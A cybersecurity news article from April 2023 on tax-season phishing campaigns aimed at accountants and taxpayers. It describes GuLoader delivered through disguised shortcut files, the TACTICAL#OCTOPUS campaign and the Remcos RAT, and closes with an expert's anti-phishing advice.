Tax season scams.
N2K logoApr 17, 2023

Hey, America--you've got until Tuesday to file your income tax returns. (And you're welcome to the reminder.) But be careful--the hoods know the deadline, too.

Tax season scams.

Tuesday, April 18th, is the day on which US income tax returns are due this year. The traditional April 15th deadline for filing falling as it did on a weekend, and Emancipation Day's observance on Monday pushed the filing deadline back an additional day. Tax season is usually an occasion for a wide range of fraud, combining as it does fear and greed (mostly fear, but some greed, too) emotions that tend to cloud the judgment and render people vulnerable to scams.

Spearphishing Tax Professionals. 

This year a number of such scams, however, have been targeted at victims who normally have greater detachment than the harried and baffled taxpayers themselve. Criminals, Sophos researchers report on the eve of the US tax filing deadline, are conducting spearphishing campaigns agains tax professionals themselves.

“Financial accountant firms and CPAs are in the crosshairs this tax season, as a threat actor is targeting that industry with an attack that combines social engineering with a novel exploit against Windows computers to deliver malware called GuLoader,” Sophos writes. GuLoader is an unusually evasive shellcode-based downloader that can be used to infect compromised victims with follow-on attacks. 

In the come-on, the hoods represent themselves as potential customers inquiring whether the tax professionals receiving the email are taking on new clients:

“The attack begins with an email that purports to solicit business from the tax preparation firm. The initial message to the target is benign, with a subject line of Prospective Client Enquiries containing nothing more than an introduction and a request for information about ‘onboarding new clients.’ The email sender goes on to claim that ‘The CPA I used last year is retired, so here I am on the lookout for a new firm to work with.’”

That’s the first phase of a two-stage attack. Should the firm the criminals contact reply, “the sender then sends a follow-up email with a link to a password-protected Zip file hosted on a cloud storage service. The Zip archive has a filename that includes the last name of the fictitious person whose purportedly sent the initial email message.” At least one of the files is benign chum, but benign chum the recipient if unlikely to be able to open, which will in all likelihood lead them to open the second file, “aWindows Shortcut (.LNK file) labeled with a PDF file suffix and with an icon that makes it appear to be a PDF document.” That’s the file that conceals the phish hook, “a shortcut command pulls down a Visual Basic script, drops it into the C:\Windows\Tasks folder, and executes it.” And a second command downloads some additional benign misdirection: “A second command appended to the first drops an actual PDF document (of someone’s IRS form W-2, 1099, or 1040) into the same location and opens it as well, as a decoy.”

The password-protection around the zip file, for which the social engineers will helpfully offer a password, is particularly useful in enabling the malicious code to bypass email filters.


Securonix began publishing research into this particular threat as early as March, when they identified a campaign of phishing emails they tracked as Tactical#Octopus. "The Securonix Threat Research team has identified an ongoing hyper-targeted phishing campaign (tracked by Securonix Threat Research as TACTICAL#OCTOPUS) targeting individuals in the US using seemingly valid tax forms and contracts. Some of the lure documents observed contained employee W-2 tax documents, I-9, and real estate purchase contracts." The bundling of the malicious phish hook in a password-protected zip file has proceeded in distinct stages. After the criminals initiate contact, they induce an initial infection: a "PowerShell one liner command that downloads the Visual Basic file." The next phase is VBS file execution, which in turn enables PowerShell execution, at which point they've achieved access to the victim's system.

It's a clever campaign. Securonix says that attribution is ambigous, but that circumstantial evidence points to a Russian threat actor. "Two of three IP addresses identified in the attack were registered to Petersburg Internet Network Ltd. in the Russian Federation. This could indicate Russian origins, however the possibility of false flag operations cannot be ruled out at this point."

Remcos RAT is the common final payload.

Once they've phished their way into a foothold in the victims' systems, what are the threat actors going to do with their access. According to Microsoft, in most cases, they're installing the Remcos remote access Trojan (RAT). Remcos, developed in 2016 and in malicious use since shortly after its introduction, enables the attacker to gain administrative privileges in Windows systems. Microsoft writes, "Successful delivery of a Remcos payload could provide an attacker the opportunity to take control of the target device to steal information and/or move laterally through the target network."

Advice on avoiding tax season attacks.

James McQuiggan, Security Awareness Advocate at KnowBe4, wrote to urge vigilance as tax season comes to a close:

"Tax season presents an excellent chance for cybercriminals to exploit unsuspecting tax professionals and taxpayers. It is crucial to stay vigilant and take necessary precautions to protect against these attacks. Users and organizations can reduce the risk of a data breach by being skeptical and cautious with emails, keeping software and systems up to date, and avoiding public Wi-Fi networks when accessing sensitive information. With all emails and determining if the email is a potential phishing attempt, users will want to check for several items to verify the authenticity. These steps work towards developing new habits with email, and while they may not want to, it reduces the loss of data and damage to a user or organization.

"Check the sender's authenticity by checking their email address and make sure it matches the sender's organization or if it's a completely random email address. Avoid clicking on suspicious links, which may direct you to a malicious site. If the user needs clarification, there are free online services where you can copy and paste the link into their tool, and they can determine if it's malicious or not. Users can protect themselves against the tax season style of phishing emails and help prevent their personal information from falling into the hands of cybercriminals. Being cautious, with a healthy level of skepticism, and taking the necessary precautions is the best defense against these attacks."